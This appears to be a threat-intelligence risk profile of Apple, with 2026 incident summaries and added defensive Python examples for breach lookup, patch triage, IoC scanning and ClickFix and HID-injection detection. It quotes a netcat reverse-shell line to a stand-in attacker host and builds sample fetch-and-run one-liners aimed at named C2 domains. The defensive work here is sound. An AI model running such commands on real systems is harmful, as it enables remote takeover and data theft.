Apple A.I CyberSecurity Scoring
Apple
Company Information
Website: http://www.apple.com/careers
Employees number: 173,021
Number of followers: 18,033,868
NAICS: 334
Industry Type: Computers and Electronics Manufacturing
Homepage: apple.com
Apple Risk Score (AI oriented): 664/1000, grade B (Weak), range 650–699
Updated: 04/06/2026
Apple Global Score (TPRM): score locked
Current Score: 664 B (WEAK) on a 0–1000 scale
40 incidents, -6.63 avg impact
Incident timeline with MITRE ATT&CK tactics, techniques, and mitigations.
JUNE 2026 · score 663
MAY 2026 · score 685
Ransomware · 08 May 2026 · Apple · CRITICAL-27 · score 658 · ID GOOFOXAPP1778617574
Foxconn, Google and Apple: Foxconn confirms cyberattack impacting North American factories
Foxconn Recovers from Nitrogen Ransomware Attack Disrupting North American Factories
Taiwanese electronics giant Foxconn has restored normal production at its North American factories following a cyberattack that disrupted operations. The company, which manufactures products for major tech firms like Apple, Google, and Microsoft, confirmed the incident but did not disclose how many of its facilities located in Wisconsin, Ohio, Texas, Virginia, Indiana, and Mexico were affected.
A Foxconn spokesperson stated that its cybersecurity team activated emergency protocols to maintain production and delivery continuity, though employees at a Wisconsin plant reported Wi-Fi outages and manual workarounds starting Friday. Computers were offline, forcing staff to rely on paper records until systems were restored.
The Nitrogen ransomware gang claimed responsibility for the attack, alleging it stole 8 terabytes of data, including sensitive technical files from multiple tech companies. Cybersecurity researchers link Nitrogen to the defunct Conti ransomware, describing it as a financially motivated group active since 2023.
Foxconn, which reported $258.3 billion in 2025 revenue, has been a frequent ransomware target. Previous attacks include a 2024 LockBit breach on its semiconductor division and incidents in Mexico in 2020 and 2022. The latest disruption underscores the persistent cyber threats facing global manufacturing supply chains.
MAY 2026 · score 705
Breach · 04 May 2026 · Apple · CRITICAL-20 · score 685 · ID METORATICBANYAHATTADOAPPCOLGOO1777962591
Facebook, Ticketmaster, Google, AT&T, Apple, Santander, Oracle, Yahoo, Adobe and Colonial Pipeline: How to Check & What to Do
Massive Password Breaches in 2024–2025: What You Need to Know
In 2025, cybersecurity researchers uncovered two of the largest credential leaks in history: a 16 billion-password compilation (an aggregation of thousands of breaches collected over several years) and a 184 million-record database sourced from infostealer malware, containing active logins for platforms like Google, Apple, Microsoft, and Facebook. These incidents are part of an accelerating trend: password breaches are no longer isolated events but a persistent, industrial-scale threat.
### How Password Breaches Happen
Attackers exploit vulnerabilities, misconfigured servers, or phishing attacks to steal credential databases from platforms. Once exfiltrated, the data is traded on dark web forums, packaged into "combo lists," and used in credential-stuffing attacks: automated attempts to log into other services with the same stolen username/password pairs. By the time a breach is publicly disclosed (often months later), the credentials may already have been circulating for weeks.
### Why Password Breaches Are Uniquely Dangerous
Unlike general data breaches (which may expose names or payment details), password breaches give attackers direct access to accounts. Weak or reused passwords amplify the risk: a single leaked credential can compromise multiple accounts if reused. According to Verizon’s Data Breach Investigations Report, stolen credentials are the leading cause of hacking-related breaches, responsible for incidents like the Colonial Pipeline attack.
### Major Breaches in Recent Years
- 2025: 16B-password compilation (multi-source aggregation); 184M-record infostealer dump.
- 2024: Ticketmaster (560M records), Snowflake-linked breaches (AT&T, Santander), alleged Oracle Cloud compromise.
- 2022: LastPass (encrypted vaults + unencrypted metadata stolen).
- 2013–2016: Yahoo (3B accounts), Adobe (153M), LinkedIn (117M).
### How Platforms Detect Breached Passwords
Google, Apple, Chrome, and Safari now include built-in breach monitoring:
- Google Password Checkup: Cross-references saved credentials against a database of 4B+ compromised passwords.
- Apple’s Password Monitor: Flags breached passwords in iCloud Keychain using privacy-preserving hashing.
- Firefox Monitor/Have I Been Pwned (HIBP): Public tools to check email addresses against breach datasets.
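The lookups above work without the checking service ever seeing the password. The following added example (not Apple's, Google's or HIBP's code) models the simplest form of that scheme, the hash-prefix k-anonymity range query used by Have I Been Pwned's Pwned Passwords API: the client hashes the password, sends only the first five hex characters of the hash, the server returns every suffix it holds under that prefix with a breach count, and the match is made locally. Both sides are written out here; the leaked-password corpus is constructed for the example.

```python
"""Breached-password lookup with hash-prefix k-anonymity.

Added illustration, not Apple's Password Monitor, Google's Password Checkup or
HIBP's client code. The client hashes the password, sends only a short hash
prefix, the server returns every suffix it holds under that prefix with a
breach count, and the match is made locally, so the server never sees the
password or its full hash. The leaked corpus is constructed for the example.
"""
from __future__ import annotations

import hashlib
from collections import defaultdict

PREFIX_LEN = 5  # 5 hex chars = 20 bits; each bucket hides the query among many hashes

# Constructed corpus of "leaked" passwords with occurrence counts (not real breach data).
LEAKED_CORPUS = {
    "password": 10_500_000,
    "123456": 50_000_000,
    "letmein": 120_000,
    "qwerty": 3_900_000,
    "correcthorsebatterystaple": 1_200,
}


def sha1_hex(password: str) -> str:
    """SHA-1 is used because the range-query scheme is keyed on it,
    not because it is a suitable hash for storing passwords."""
    return hashlib.sha1(password.encode("utf-8")).hexdigest().upper()


def build_range_index(corpus: dict[str, int]) -> dict[str, dict[str, int]]:
    """Server side: bucket hash suffixes under their 5-character prefix."""
    index: dict[str, dict[str, int]] = defaultdict(dict)
    for pwd, count in corpus.items():
        h = sha1_hex(pwd)
        index[h[:PREFIX_LEN]][h[PREFIX_LEN:]] = count
    return dict(index)


def range_query(index: dict[str, dict[str, int]], prefix: str) -> dict[str, int]:
    """Server side: the only thing the server receives is the prefix."""
    if len(prefix) != PREFIX_LEN or any(c not in "0123456789ABCDEF" for c in prefix):
        raise ValueError(f"prefix must be {PREFIX_LEN} uppercase hex characters")
    return dict(index.get(prefix, {}))


def check_password(password: str, index: dict[str, dict[str, int]]) -> int:
    """Client side: breach count for `password`, or 0 if it is not in the corpus.

    Only `prefix` would cross the network; the suffix comparison stays local.
    """
    h = sha1_hex(password)
    prefix, suffix = h[:PREFIX_LEN], h[PREFIX_LEN:]
    suffixes = range_query(index, prefix)  # stands in for the HTTPS range request
    return suffixes.get(suffix, 0)


if __name__ == "__main__":
    idx = build_range_index(LEAKED_CORPUS)
    for candidate in ("password", "xK9#vP2$mQ7&nL4!"):
        n = check_password(candidate, idx)
        print(f"{candidate!r}: {'seen %d times' % n if n else 'not found'}")
```

With a real corpus of hundreds of millions of hashes, each 20-bit prefix bucket holds several hundred suffixes, so the server learns only that the queried password hashes into one of those buckets. The client should still treat the response as untrusted input and compare suffixes locally rather than sending the full hash to "help" the server.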
### What to Do If Your Password Is Breached
1. Change the flagged password immediately and any other accounts using it.
2. Prioritize high-risk accounts (email, financial, healthcare).
3. Use a password manager (Bitwarden, 1Password, Keeper) to generate and store unique passwords.
4. Enable two-factor authentication (2FA) on critical accounts.
### Dark Web Monitoring: The Next Layer of Defense
Standard tools (HIBP, Google Checkup) rely on publicly disclosed breaches, which can lag behind criminal activity. Dark web monitoring scans private forums, infostealer logs, and marketplaces to detect stolen credentials before they appear in public databases, narrowing the window for attackers to exploit them.
The scale of credential exposure in 2024–2025 underscores a grim reality: most users have had a password leaked at least once. The question is no longer whether, but how many times, and whether proactive measures are in place to limit the damage.
APRIL 2026 · score 702
MARCH 2026 · score 701
Vulnerability · 20 Mar 2026 · Apple · CRITICAL-1 · score 700 · ID APP1774247546
Apple: Apple urges iPhone users to update as Coruna and DarkSword exploit kits emerge
Apple Warns of Active iOS Exploit Kits Coruna and DarkSword, Urges Immediate Updates
Apple has issued a security advisory warning iPhone users of two advanced exploit kits, Coruna and DarkSword, that target outdated iOS versions. Both deliver full-chain exploits through malicious web content to steal sensitive data, including credentials and cryptocurrency wallet information.
### Coruna Exploit Kit: A Highly Engineered Threat
Discovered by Google’s Threat Intelligence Group (GTIG) in February 2025, Coruna (also known as CryptoWaters) is a sophisticated iOS exploit kit containing 23 exploits across five full chains, targeting iPhones running iOS 13.0 through 17.2.1. The kit employs WebKit remote code execution (RCE), pointer authentication (PAC) bypasses, and sandbox escapes, with some exploits using non-public techniques to bypass mitigations.
Key details:
- Initial detection: February 2025, linked to a surveillance vendor’s customer.
- Attack vectors: Malicious links, compromised websites, and watering hole attacks (e.g., Ukrainian government sites).
- Threat actors: Used by UNC6353 (Ukrainian watering hole campaigns), UNC6691 (Chinese financial threat actor), and surveillance vendors.
- Post-exploitation: Deploys PlasmaLoader, a stager that scans for crypto wallets, banking data, and backup phrases, exfiltrating data via encrypted C2 servers.
- Evasion: Avoids devices in Lockdown Mode or private browsing; uses domain generation algorithms (DGA) seeded with "lazarus" for persistence.
Apple patched the vulnerabilities in March 2026, extending protection to iOS 15 and 16 via a Critical Security Update. Devices on iOS 13 or 14 must upgrade to iOS 15+ to mitigate risks.
### DarkSword: A New, Aggressive iOS Exploit Chain
Identified by Lookout Threat Labs in late 2025, DarkSword is a zero-day-heavy exploit kit targeting iOS 18.4–18.7, used in campaigns against Saudi Arabia, Turkey, Malaysia, and Ukraine. The kit relies on six vulnerabilities, including three zero-days, to achieve full device compromise with minimal user interaction.
Key details:
- Vulnerabilities exploited:
  - CVE-2025-31277 (JavaScriptCore memory corruption, CVSS 8.8)
  - CVE-2026-20700 (dyld PAC bypass, CVSS 8.6, zero-day)
  - CVE-2025-43529 (JavaScriptCore memory corruption, CVSS 8.8, zero-day)
  - CVE-2025-14174 (ANGLE memory corruption, CVSS 8.8, zero-day)
  - CVE-2025-43510 & CVE-2025-43520 (iOS kernel memory issues, CVSS 8.6)
- Attackers: Linked to UNC6353, a suspected Russian-aligned group targeting Ukrainian sites; also used by surveillance vendors and nation-state actors.
- Tactics: "Hit-and-run" exfiltration steals data within seconds to minutes, then cleans traces.
- Targets: Crypto wallets, credentials, and financial data; observed on fake financial/crypto sites via hidden iframes.
- Infrastructure: Poor obfuscation and AI-assisted code suggest reliance on third-party exploits, possibly from Russian ecosystems.
### Apple’s Response and Mitigations
Apple released emergency patches on March 11, 2026, addressing the vulnerabilities in iOS 15–18. Key protections:
- Devices on the latest iOS releases are patched against both exploit kits.
- Lockdown Mode blocks attacks, even on older systems.
- Safari’s Safe Browsing blocks known malicious domains by default.
- iOS 13/14 users must upgrade to iOS 15+ and apply the Critical Security Update.
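For a fleet, the practical question is which devices sit inside the version ranges the two kits target and what each one needs. The following added example (not Apple's, Google's or Lookout's tooling) triages an MDM inventory export against those ranges. The ranges and the patch guidance (no fix for iOS 13/14, a Critical Security Update for iOS 15/16) come from the advisory text above; the inventory columns, the device names and the rule that any 18.7.x point release counts as 18.7 are assumptions, and the inventory itself is constructed.

```python
"""Triage an MDM device inventory against the iOS version ranges Coruna and
DarkSword target. Added example, not Apple's, Google's or Lookout's tooling.
Version ranges and patch guidance come from the advisory; the inventory layout,
device names and the "any 18.7.x" rule are assumptions; the data is constructed.
"""
from __future__ import annotations

import csv
import io
from dataclasses import dataclass
from typing import Optional


def parse_version(s: str) -> tuple[int, int, int]:
    """'17.2.1' -> (17, 2, 1); pad to three parts so '18.4' compares as 18.4.0."""
    parts = [int(p) for p in s.strip().split(".")]
    if not 1 <= len(parts) <= 3:
        raise ValueError(f"unexpected iOS version string: {s!r}")
    while len(parts) < 3:
        parts.append(0)
    return parts[0], parts[1], parts[2]


# Inclusive ranges from the advisory. 999 stands for "any point release" (assumption).
CORUNA_RANGE = (parse_version("13.0"), parse_version("17.2.1"))
DARKSWORD_RANGE = (parse_version("18.4"), (18, 7, 999))


def in_range(v: tuple[int, int, int], rng) -> bool:
    lo, hi = rng
    return lo <= v <= hi


@dataclass
class Finding:
    device: str
    version: str
    kit: str
    action: str


def triage_device(device: str, version: str, lockdown_mode: bool) -> Optional[Finding]:
    v = parse_version(version)
    if in_range(v, CORUNA_RANGE):
        kit = "Coruna"
        if v[0] <= 14:
            action = "upgrade to iOS 15 or later; no fix is available for iOS 13/14"
        elif v[0] <= 16:
            # The CSU does not change the OS version string, so MDM must report it separately (assumption).
            action = "confirm the March 2026 Critical Security Update is installed, or update"
        else:
            action = "update past iOS 17.2.1"
    elif in_range(v, DARKSWORD_RANGE):
        kit = "DarkSword"
        action = "update to the current iOS release"
    else:
        return None
    if lockdown_mode:
        action += " (Lockdown Mode reported on, which the advisory says blocks both kits; patch regardless)"
    return Finding(device, version, kit, action)


def triage_inventory(csv_text: str) -> list[Finding]:
    findings = []
    for row in csv.DictReader(io.StringIO(csv_text)):
        f = triage_device(row["device"], row["ios_version"],
                          row["lockdown_mode"].strip().lower() == "true")
        if f is not None:
            findings.append(f)
    return findings


# Constructed inventory export (not real devices).
SAMPLE_INVENTORY = """device,ios_version,lockdown_mode
exec-01,18.6.2,false
press-02,17.2.1,true
legacy-03,14.8.1,false
dev-04,16.7.10,false
fleet-05,17.3,false
fleet-06,18.3.2,false
fleet-07,26.3.1,false
"""

if __name__ == "__main__":
    for f in triage_inventory(SAMPLE_INVENTORY):
        print(f"{f.device:10} iOS {f.version:8} {f.kit:9} -> {f.action}")
```

Versions are compared as integer tuples rather than strings so that 16.7.10 sorts after 16.7.9 and 18.4 equals 18.4.0; a device outside both ranges gets no finding here, which only means neither kit is documented as targeting it, not that it is current.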
### Broader Implications
The emergence of Coruna and DarkSword highlights:
- Exploit proliferation: Advanced iOS exploits are now commoditized, reused by multiple threat actors (surveillance vendors, nation-states, cybercriminals).
- Financial and espionage motives: Actors blend crypto theft with intelligence gathering (e.g., UNC6353’s dual targeting).
- Secondary exploit markets: Zero-days are brokered and repurposed, extending their lifespan beyond initial discovery.
Google and Lookout have published Indicators of Compromise (IOCs) and Yara rules to aid detection. The incidents underscore the critical need for timely iOS updates to counter evolving threats.
MARCH 2026 · score 702
Vulnerability · 17 Mar 2026 · Apple · CRITICAL-1 · score 701 · ID APP1773844056
Apple: Apple WebKit Vulnerability Allows Malicious Content Bypass on iOS and macOS
Apple Patches Critical WebKit Vulnerability Exposing iOS, iPadOS, and macOS Users to Data Theft
Apple released an emergency security update on March 17, 2026, to fix a severe WebKit vulnerability (CVE-2026-20643) that could allow attackers to bypass browser security protections and steal sensitive user data. The flaw, discovered by security researcher Thomas Espach, affects iOS 26.3.1, iPadOS 26.3.1, and macOS 26.3.1/26.3.2, leaving devices vulnerable to web-based exploits.
The vulnerability resides in the Navigation API within WebKit, the engine powering Safari and other web applications. By exploiting improperly validated inputs, attackers could circumvent the Same Origin Policy (SOP), a core security measure that prevents websites from accessing data across different domains. A successful exploit could enable threat actors to:
- Extract session tokens, cookies, or login credentials from other open websites.
- Perform unauthorized actions on behalf of the user, such as interacting with online banking or email accounts.
- Silently exfiltrate sensitive data without user awareness.
Apple addressed the issue by enhancing input validation in WebKit, preventing malicious payloads from violating cross-origin restrictions. The patch was delivered via Background Security Improvements, a system introduced to deploy critical fixes silently without requiring a full OS upgrade or device restart. This mechanism, enabled by default on devices running iOS 26.1, iPadOS 26.1, and macOS 26.1 or later, allows Apple to respond rapidly to high-risk threats while minimizing disruption. It also includes a rollback capability to revert patches if compatibility issues arise.
The incident underscores the evolving sophistication of browser-based attacks and the necessity of agile patching strategies. Apple’s background update system reflects a broader shift toward continuous security delivery, ensuring users remain protected against emerging threats without manual intervention.
MARCH 2026 · score 702
Vulnerability · 10 Mar 2026 · Apple · CRITICAL-1 · score 701 · ID APP1773124191
Apple: Google warns about data breach on Apple iPhones
Google Warns of "Coruna" Vulnerabilities Targeting iPhone Users
Google has issued a security alert regarding a potential cyberattack exploiting a set of vulnerabilities known as "Coruna" that could compromise iPhones. The threat involves 23 distinct security flaws that, if exploited, allow attackers to bypass iOS protections, gain deep system access, and potentially steal sensitive data including financial information, communications, and authentication credentials.
The vulnerabilities enable stealthy infiltration, with attackers able to override built-in defenses and manipulate core device functions without user awareness. While the exact origin of the attack remains unclear, Google Threat Intelligence is investigating, noting the lack of clear attribution to a specific group or nation-state actor.
Security firm iVerify has suggested a possible link to tools developed by or associated with the Pentagon, citing their sophistication in exploiting Apple’s system-level defenses. The discovery raises concerns about how such tools may have been repurposed or leaked for malicious use.
The incident highlights the persistent risks in even widely trusted platforms, as cybersecurity teams race to identify and patch vulnerabilities before widespread exploitation occurs. Apple and independent researchers are actively monitoring the situation to assess the full scope of the threat.
MARCH 2026 · score 706
Cyber Attack · 05 Mar 2026 · Apple · HIGH-4 · score 702 · ID OPEGOOFACAPP1772800304
Google, Facebook, OpenAI and Apple: Phishing Emails Push Fake ChatGPT and Gemini iOS Apps To Steal Logins
Sophisticated Phishing Campaign Targets iPhone Users via Fake ChatGPT and Gemini Apps on Apple App Store
A highly targeted phishing campaign is exploiting trust in two leading AI brands, OpenAI’s ChatGPT and Google’s Gemini, to deceive iPhone users into downloading malicious apps from Apple’s official App Store. The attack, uncovered by SpiderLabs, uses deceptive emails posing as legitimate outreach from these platforms to direct victims to fraudulent applications disguised as AI-powered business or advertising tools.
Two malicious apps, GeminiAI Advertising (ID: id6759005662) and Ads GPT (ID: id6759514534), were identified on the Australian App Store storefront. Despite appearing on a trusted platform, the apps lack any genuine functionality. Instead, they immediately present a fake Facebook login screen and harvest credentials in real time when users attempt to sign in. The stolen data grants attackers access to personal profiles, business ad accounts, and linked pages, amplifying the potential damage.
This campaign marks a tactical evolution in credential theft, bypassing traditional methods like fake websites or malicious attachments in favor of infiltrating an official app marketplace. The use of the App Store, perceived as a secure environment, significantly lowers user skepticism and makes the attack more effective. While the apps were hosted on the Australian storefront, the phishing emails targeted global users, particularly business professionals, marketers, and social media managers.
The attack chain begins with a convincing email and reinforces legitimacy at each step, from the sender’s display name to the App Store listing. Once installed, the apps exploit this trust by mimicking Facebook’s login interface, leaving victims unaware of the compromise. The incident underscores the challenges of vetting applications on large-scale distribution platforms, even those with rigorous review processes.
Indicators of Compromise (IoCs):
- GeminiAI Advertising: `hxxps[://]apps[.]apple[.]com/au/app/geminiai-advertising/id6759005662`
- Ads GPT: `hxxps[://]apps[.]apple[.]com/au/app/ads-gpt/id6759514534`
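The IoCs are published defanged, and the same listing can be reached through other storefront locales or URL slugs, so matching on the full URL misses traffic. The following added example (not SpiderLabs' tooling) refangs the two IoCs above, reduces them to their App Store app IDs, and scans proxy-style log lines for any request that resolves to those IDs. The log format and the log lines are constructed for the example; the two IoCs are the ones listed above.

```python
"""Refang the App Store IoCs above and scan log lines for them, keyed on the app ID
rather than the full URL. Added example, not SpiderLabs' tooling; the log layout and
log lines are constructed, the IoCs are the two listed in the write-up.
"""
from __future__ import annotations

import re

DEFANGED_IOCS = [
    "hxxps[://]apps[.]apple[.]com/au/app/geminiai-advertising/id6759005662",
    "hxxps[://]apps[.]apple[.]com/au/app/ads-gpt/id6759514534",
]


def refang(ioc: str) -> str:
    """Undo the usual defanging: hxxp(s) -> http(s), [://] -> ://, [.] and (.) -> ."""
    s = ioc.strip()
    s = re.sub(r"^hxxp", "http", s, flags=re.IGNORECASE)
    for bracketed, plain in (("[://]", "://"), ("[.]", "."), ("(.)", "."), ("[:]", ":")):
        s = s.replace(bracketed, plain)
    return s


# Storefront locale and slug are optional; the trailing id<digits> identifies the listing.
APP_ID_RE = re.compile(r"apps\.apple\.com/(?:[a-z]{2}/)?app/(?:[^/\s?]+/)?(id\d+)", re.IGNORECASE)


def app_id(url: str) -> str | None:
    m = APP_ID_RE.search(url)
    return m.group(1).lower() if m else None


MALICIOUS_APP_IDS = {app_id(refang(ioc)) for ioc in DEFANGED_IOCS}

# Assumed log layout: "<timestamp> <user> <url>" (constructed for the example).
LOG_LINE_RE = re.compile(r"^(?P<ts>\S+)\s+(?P<user>\S+)\s+(?P<url>\S+)")


def scan_log(lines) -> list[tuple[str, str, str]]:
    """Return (timestamp, user, app_id) for every request to a listed app."""
    hits = []
    for line in lines:
        m = LOG_LINE_RE.match(line)
        if not m:
            continue
        aid = app_id(m.group("url"))
        if aid in MALICIOUS_APP_IDS:
            hits.append((m.group("ts"), m.group("user"), aid))
    return hits


# Constructed log lines: an AU-storefront hit, a US-storefront hit on the same app ID,
# an unrelated app, and a non-Apple host that merely contains one of the IDs.
SAMPLE_LOG = """2026-03-04T09:12:55Z alice https://apps.apple.com/au/app/geminiai-advertising/id6759005662
2026-03-04T09:13:02Z bob https://apps.apple.com/us/app/ads-gpt/id6759514534?platform=iphone
2026-03-04T09:14:10Z carol https://apps.apple.com/us/app/some-benign-app/id1000000000
2026-03-04T09:15:00Z dave https://example.invalid/id6759005662
"""

if __name__ == "__main__":
    for ts, user, aid in scan_log(SAMPLE_LOG.splitlines()):
        print(f"{ts} {user} reached listed app {aid}")
```

Keying on the app ID is what lets the second line match even though the IoC names the `/au/` storefront; the last line does not match because the host is not the App Store, which is the behaviour you want from an indicator tied to a listing rather than to a number.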
FEBRUARY 2026 · score 708
Cyber Attack · 14 Feb 2026 · Apple · CRITICAL-4 · score 704 · ID ANTGOOAPPMED1771064819
Anthropic, Google, Medium and Apple: Malicious Campaign Uses Claude Artifacts and Google Ads to Deliver macOS Malware
Sophisticated macOS Malware Campaign Exploits Google Ads, Claude AI, and Medium to Distribute MacSync Stealer
A recent malware campaign is targeting macOS users through a multi-pronged attack leveraging sponsored Google search results, Claude AI’s public artifact feature, and fraudulent Medium articles. The operation, uncovered by cybersecurity researchers at Moonlock Lab, has exposed over 15,000 users to the MacSync information stealer, which siphons sensitive data including keychain credentials, browser data, and cryptocurrency wallets.
The campaign employs two distinct variants, both using the ClickFix social engineering technique to deceive users into executing malicious commands.
### First Variant: Fake DNS Resolver via Claude AI
When users search for "Online DNS resolver" on Google, a sponsored result directs them to a public Claude AI artifact titled "macOS Secure Command Execution." The fake guide masquerades as a legitimate security tool and instructs victims to paste a base64-encoded command into Terminal. Once executed, the command fetches a MacSync loader, staged at `/tmp/osalogging.zip`, which then contacts a command-and-control (C2) server at `a2abotnet[.]com/dynamic`.
The malware uses a hardcoded authentication token and API key, spoofs a macOS browser User-Agent string to evade detection, and exfiltrates stolen data via Apple’s `osascript` utility. Larger datasets are uploaded in chunks with retry mechanisms and exponential backoff to ensure successful transmission. After exfiltration, the malware deletes staging files to cover its tracks.
### Second Variant: Fake Disk Space Analyzer via Medium
A second attack vector targets users searching for "macOS CLI disk space analyzer" through a fraudulent Medium article hosted at `apple-mac-disk-space.medium[.]com`. The article impersonates Apple’s official Support Team and delivers a similar ClickFix payload with additional obfuscation, including string-concatenation tricks (e.g., `cur""l`, which the shell reads as `curl`) to defeat signature matching. The malicious payload is fetched from `raxelpak[.]com`.
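Both variants hand the victim a one-liner that is either base64-wrapped or split with empty quotes so that a simple string match on `curl` or `osascript` fails. The following added example (not Moonlock Lab's detection logic) normalises a pasted command the way the shell would, by removing empty-quote splits and decoding `echo <b64> | base64 -d` layers, and then scores the result for ClickFix indicators drawn from the write-up: a download written to `/tmp`, a fetch piped straight into an interpreter, `osascript`, and the two domains above. The sample commands are constructed, inert strings that carry those indicators; they are not the real payloads.

```python
"""Normalise a pasted Terminal one-liner (base64-wrapped or empty-quote-split, as in
the ClickFix lures above) and score it for ClickFix indicators. Added example, not
Moonlock Lab's detection logic; the sample commands are constructed, inert strings.
"""
from __future__ import annotations

import base64
import binascii
import re

KNOWN_C2 = ("a2abotnet.com", "raxelpak.com")  # refanged from the write-up

EMPTY_QUOTE_RE = re.compile(r'""|\'\'')  # cur""l -> curl, b''ash -> bash
B64_PIPE_RE = re.compile(
    r"echo\s+[\"']?([A-Za-z0-9+/=]{16,})[\"']?\s*\|\s*base64\s+(?:-d|-D|--decode)\b"
)
FETCH_TO_INTERP_RE = re.compile(r"\b(?:curl|wget)\b[^\n|]*\|\s*(?:sh|bash|zsh|osascript)\b")
FETCH_TO_TMP_RE = re.compile(r"\b(?:curl|wget)\b[^\n]*\s-[oO]\s*/tmp/")


def strip_empty_quotes(cmd: str) -> str:
    """The shell concatenates adjacent quoted strings, so cur""l is just curl."""
    return EMPTY_QUOTE_RE.sub("", cmd)


def decode_b64_stages(cmd: str, max_depth: int = 3) -> list[str]:
    """[pasted, decoded, decoded-of-decoded, ...] following `echo <b64> | base64 -d` layers."""
    stages = [cmd]
    for _ in range(max_depth):
        m = B64_PIPE_RE.search(stages[-1])
        if m is None:
            break
        try:
            decoded = base64.b64decode(m.group(1), validate=True).decode("utf-8", "replace")
        except (binascii.Error, ValueError):
            break
        stages.append(decoded)
    return stages


def score_command(cmd: str) -> dict:
    stages = [strip_empty_quotes(s) for s in decode_b64_stages(strip_empty_quotes(cmd))]
    text = "\n".join(stages)
    reasons = []
    if len(stages) > 1:
        reasons.append("base64-wrapped stage")
    if EMPTY_QUOTE_RE.search(cmd):
        reasons.append("empty-quote token splitting")
    if FETCH_TO_INTERP_RE.search(text):
        reasons.append("download piped straight into an interpreter")
    if FETCH_TO_TMP_RE.search(text):
        reasons.append("payload written to /tmp")
    for dom in KNOWN_C2:
        if dom in text:
            reasons.append(f"known C2 domain {dom}")
    if "osascript" in text:
        reasons.append("osascript invoked")
    # A single signal (a plain base64 decode, say) is common in legitimate use; require two.
    return {"normalized": stages[-1], "reasons": reasons,
            "verdict": "block" if len(reasons) >= 2 else "allow"}


# Constructed samples (inert strings that carry the indicators, not the real payloads).
INNER_1 = ("curl -fsSL https://a2abotnet.com/dynamic -o /tmp/osalogging.zip "
           "&& osascript -e 'display notification \"done\"'")
SAMPLE_CLICKFIX_1 = f"echo {base64.b64encode(INNER_1.encode()).decode()} | base64 -d | bash"
SAMPLE_CLICKFIX_2 = 'cur""l -fsSL https://raxelpak.com/analyzer.sh | b""ash'
SAMPLE_BENIGN_B64 = f"echo {base64.b64encode(b'hello from a harmless note').decode()} | base64 -d"

if __name__ == "__main__":
    for name, cmd in (("variant 1", SAMPLE_CLICKFIX_1), ("variant 2", SAMPLE_CLICKFIX_2),
                      ("benign", SAMPLE_BENIGN_B64), ("benign", "brew install ncdu")):
        r = score_command(cmd)
        print(f"{name:9} {r['verdict']:5} {r['reasons']}")
```

The decode loop is bounded because nested wrapping is cheap for the attacker and unbounded for the detector, and the two-signal threshold keeps an ordinary `base64 -d` from being blocked on its own; in a clipboard or shell-history monitor you would tune both against your own users' commands.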
### Evasion Tactics and Broader Implications
The threat actors behind this campaign demonstrate a deep understanding of social engineering and evasion techniques, exploiting trusted platforms like Google Ads, Claude AI, and Medium to lend legitimacy to their attacks. By abusing these services, they bypass traditional security controls and reach a broader audience.
The MacSync stealer remains a persistent threat, with its operators continuously refining their methods to avoid detection while maximizing data theft. The campaign underscores the growing trend of malware distributors leveraging legitimate services to propagate malicious payloads.
FEBRUARY 2026 · score 709
Vulnerability · 12 Feb 2026 · Apple · CRITICAL-1 · score 708 · ID AMAAPPMIC1770935300
Microsoft, Amazon and Apple: $44 “Evilmouse” Can Autonomously Execute Commands and Compromise Systems
EvilMouse: A $44 USB Mouse That Silently Hijacks Systems
Security researcher NEWO-J has unveiled EvilMouse, a low-cost, fully functional USB mouse that covertly injects malicious keystrokes upon connection. Built for under $44 using a Raspberry Pi Pico RP2040 Zero microcontroller, the device exploits trust in everyday peripherals to bypass security measures.
Unlike suspicious USB drives, EvilMouse retains normal mouse functionality (optical tracking and buttons) while autonomously executing payloads. The build leverages a modified Amazon Basics mouse, a USB hub breakout, and custom firmware to emulate a Human Interface Device (HID), delivering attacks in seconds.
The device executes DuckyScript-like sequences, including:
- Hidden PowerShell commands (`-WindowStyle Hidden -enc`)
- Base64-encoded payloads for obfuscation
- Reverse shells via Netcat (`nc -e cmd.exe attacker_ip 4444`)
- Persistence mechanisms (e.g., scheduled tasks)
In a demo, EvilMouse compromised a Windows 11 system in 5 seconds, granting remote code execution (RCE) without triggering EDR alerts. The attack evades detection by mimicking legitimate user input, exploiting OS auto-enumeration of mice on Windows 11 and macOS Sonoma.
Security Implications
EvilMouse highlights critical gaps in HID trust models, USB hub relay security, and endpoint detection. While designed for red teaming, its low cost ($44 vs. $100+ for commercial tools) democratizes advanced attacks, posing risks to air-gapped and high-security environments.
Potential Defenses
- USB device whitelisting (Group Policy)
- Behavioral analytics (e.g., CrowdStrike Falcon’s HID monitoring)
- Physical port controls (Kensington locks)
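The "behavioral analytics" defense rests on two things the OS can observe that a human cannot fake: a device that enumerated as a pointing device is emitting keyboard reports, and the keystrokes arrive faster than anyone types. The following added example (not the EvilMouse project's code and not any EDR vendor's HID logic) applies both checks to a stream of HID events. The event format, the device-class table, the timing thresholds and the event stream itself are constructed for the example.

```python
"""Flag keystroke injection from a peripheral like EvilMouse with two behavioural
signals: keyboard reports from a device enumerated as a mouse, and inter-keystroke
timing below human range. Added example, not the EvilMouse project's code nor any
EDR's HID logic; event format, device classes, thresholds and data are constructed.
"""
from __future__ import annotations

from dataclasses import dataclass
from statistics import median


@dataclass(frozen=True)
class HidEvent:
    t_ms: int
    device: str
    kind: str       # "key", "move" or "click"
    key: str = ""   # character for "key" events


# What each device claimed at enumeration (constructed; a real monitor would read the
# HID report descriptor / usage page the OS recorded for the device).
DEVICE_CLASS = {
    "usb-1234:5678": "keyboard",
    "usb-abcd:0001": "mouse",   # an EvilMouse-style composite device
}

HUMAN_MIN_MEDIAN_MS = 30  # assumption: a sustained median gap under 30 ms is not a person
MIN_KEYS = 8              # enough keystrokes to judge timing at all


def keystroke_intervals(events, device: str) -> list[int]:
    ts = [e.t_ms for e in events if e.device == device and e.kind == "key"]
    return [b - a for a, b in zip(ts, ts[1:])]


def reconstruct_text(events, device: str) -> str:
    """What the device typed, for the analyst's triage."""
    return "".join(e.key for e in events if e.device == device and e.kind == "key")


def analyze(events, device_class=DEVICE_CLASS) -> list[tuple[str, str]]:
    findings = []
    for dev in sorted({e.device for e in events}):
        keys = [e for e in events if e.device == dev and e.kind == "key"]
        if keys and device_class.get(dev) == "mouse":
            findings.append((dev, "keyboard reports from a device enumerated as a mouse"))
        if len(keys) >= MIN_KEYS:
            m = median(keystroke_intervals(events, dev))
            if m < HUMAN_MIN_MEDIAN_MS:
                findings.append((dev, f"median inter-keystroke gap {m:.0f} ms is below human range"))
    return findings


def typed_events(device: str, start_ms: int, text: str, gap_ms: int) -> list[HidEvent]:
    return [HidEvent(start_ms + i * gap_ms, device, "key", ch) for i, ch in enumerate(text)]


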